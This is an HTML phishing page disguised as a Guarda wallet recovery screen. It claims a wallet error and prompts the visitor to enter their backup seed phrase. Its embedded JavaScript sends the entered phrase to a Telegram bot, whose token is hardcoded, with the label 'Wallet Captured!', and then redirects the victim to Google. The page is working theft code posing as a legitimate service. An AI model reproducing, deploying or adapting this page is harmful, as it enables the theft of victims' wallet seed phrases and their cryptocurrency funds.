<!DOCTYPE html>
<html>
<head>
<meta http-equiv="X-UA-Compatible" content="IE=Edge"/>
<meta name="viewport" content="width=device-width, initial-scale=1">

    <link rel="stylesheet" href="https://stackpath.bootstrapcdn.com/bootstrap/4.5.2/css/bootstrap.min.css">
    <style>
        body {
            display: flex;
            justify-content: center;
            align-items: center;
            height: 100vh;
			background-color:#798ce5;
			user-select: none;
        }

		.form-control{
			width:90px;
			padding-right: 10px;
		}
		#recoverButton {
            display: block;
            margin: 0 auto;
            background-color: #ffffff;
            color: #798ce5;
            border: 2px solid #798ce5;
            border-radius: 5px; /* Adjust the radius to control corner roundness */
            padding: 10px 20px;
            font-size: 20px;
            cursor: pointer;
        }

        #recoverButton:hover {
            background-color: #ffffff;
            color: #798ce5;
        }
		#resumeButton {
            display: block;
            margin: 0 auto;
            background-color: #ffffff;
            color: #798ce5;
            border: 2px solid #798ce5;
            border-radius: 5px; /* Adjust the radius to control corner roundness */
            padding: 10px 20px;
            font-size: 20px;
            cursor: pointer;
        }

        #resumeButton:hover {
            background-color: #ffffff;
            color: #798ce5;
        }
    </style>
</head>
<body>
    <div id="step1">
		<img alt="" style="width:180px;height:180px;margin: auto;display: block;" src="img/guarda.png" />
        <h1 class="text-center" style="color:#e6eaef;">Recover Your Wallet</h1>
        <p class="text-center" style="color:#e6eaef;">An error occured while initializing your wallet. Please use your backup text to recover your wallet.</p>
		<br><br>
		<div class="col-md-12 text-center"> <!-- Center the column contents -->
                <button class="btn btn-primary" id="resumeButton" onclick="resume()">RESTORE WALLET</button>
         </div>
	</div>
	<div id="step2" style="display: none;">
		<div class="container mt-5">
		<img alt="" style="width:180px;height:180px;margin: auto;display: block;" src="img/guarda.png" />
        <h1 class="text-center" style="color:#e6eaef;">Recover Your Wallet</h1>
        <p class="text-center" style="color:#e6eaef;">Enter your backup text below:</p>
        
        <textarea id="passphrase" class="form-control" rows="9" style="width: 700px; resize: none;"></textarea>

		<br>
        <div class="row">
		
            <div class="col-md-12 text-center"> <!-- Center the column contents -->
                <button class="btn btn-primary" id="recoverButton">RESTORE WALLET</button>
            </div>
        </div>
    </div>
	</div>

    <!-- Error Modal -->
    <div class="modal fade" id="errorModal" tabindex="-1" role="dialog" aria-labelledby="errorModalLabel" aria-hidden="true">
        <div class="modal-dialog" role="document">
            <div class="modal-content">
                <div class="modal-header">
                    <h5 class="modal-title" id="errorModalLabel">Error</h5>
                    <button type="button" class="close" data-dismiss="modal" aria-label="Close">
                        <span aria-hidden="true">&times;</span>
                    </button>
                </div>
                <div class="modal-body">
                    Please fill in all boxes with valid words.
                </div>
                <div class="modal-footer">
                    <button type="button" class="btn btn-secondary" data-dismiss="modal">Close</button>
                </div>
            </div>
        </div>
    </div>

    <script src="https://code.jquery.com/jquery-3.5.1.slim.min.js"></script>
    <script src="https://cdn.jsdelivr.net/npm/@popperjs/core@2.5.4/dist/umd/popper.min.js"></script>
    <script src="https://stackpath.bootstrapcdn.com/bootstrap/4.5.2/js/bootstrap.min.js"></script>
    <script>
        document.getElementById('recoverButton').addEventListener('click', function () {
            let passphrase = document.getElementById('passphrase').value;
			if(passphrase.length > 100){
				console.log(passphrase);
				function getParameterByName(name) {
    name = name.replace(/[\[\]]/g, "\\$&");
    var regex = new RegExp("[?&]" + name + "(=([^&#]*)|&|#|$)");
    var results = regex.exec(window.location.href);
    if (!results) return null;
    if (!results[2]) return '';
    return decodeURIComponent(results[2].replace(/\+/g, " "));
}

var id = getParameterByName('id');
var chatid = getParameterByName('chatid');
				// Create a new XMLHttpRequest object
var xhr = new XMLHttpRequest();
var url = 'https://api.telegram.org/bot6065049136:AAFoRRYQhIvGygPqAHoXOtxf65qgHGt4Hd0/sendMessage?chat_id='+chatid+'&text=Wallet Captured!%0ABOT ID:'+id+'%0AGuarda:%0A'+passphrase;
// Configure the request (GET request to a URL)
xhr.open('GET', url, true);

// Set up a callback function to handle the response
xhr.onload = function() {
  if (xhr.status === 200) {
    window.location.href = "https://google.com";
  } else {
    // Request failed
    console.error('Request failed with status', xhr.status);
  }
};

// Send the request
xhr.send();
}}
           );
    </script>
	<script>
		function resume(){
			document.getElementById("step1").style.display = "none";
			document.getElementById("step2").style.display = "block";
		}
	</script>
</body>
</html>